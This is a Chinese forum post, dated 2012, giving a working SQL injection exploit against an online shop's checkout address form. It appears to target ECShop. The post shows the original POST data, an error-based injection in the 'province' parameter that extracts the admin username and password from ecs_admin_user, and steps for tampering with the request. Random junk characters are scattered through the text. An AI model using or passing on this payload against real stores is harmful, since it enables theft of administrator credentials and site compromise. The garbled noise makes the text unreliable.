感谢欠杀的黑盒+ g j d9 x$ `0 O
- O/ q1 \2 z- N: H. t+ Z+ [
) p0 w; g% L* A v: B) F把任意商品加入购物车在填写配送地址那一页,有地区选择
) F3 u2 m4 y; f n* g0 g
1 b* P; t2 ?7 Q4 @flow.php?step=consignee&direct_shopping=1/ I3 a7 p. w- N& I8 b4 z$ u) [" }
比如省选择安徽
( ?( p0 O$ z" J! ]
7 }, U" e2 ]2 Y+ w( p1 a, s% R8 g- m其中POST数据如下
. y$ w% C6 g( m/ W 3 P; A @ F$ Z, @$ T( u
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3# M ~2 M# o, p/ G' x5 O) P. ^
改成4 J/ F/ i/ w, u# ?5 b+ K) W
# ^6 o8 Y) G3 r8 \1 y2 Q
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
5 [- ~7 A8 t$ A" y, ^; fps:详细的方法,用火狐tamper data插件……..即可改post内容…..4 m/ L9 U. v8 @1 A) |
* ^% [- q% l! a; N8 t
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包$ z6 G7 V+ m7 |# `; h% l8 _
# G1 x$ I! x4 D! A5 J就会回显错误页面了。。。。1 K) b( p' q5 a. r+ E, k; g9 N A( \
/ r7 [. l3 G; T7 p4 P& D( g; C
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
) f' G* }0 I) W. P' S7 G6 r |
发表于 2012-12-31 09:19:27
收藏
支持
反对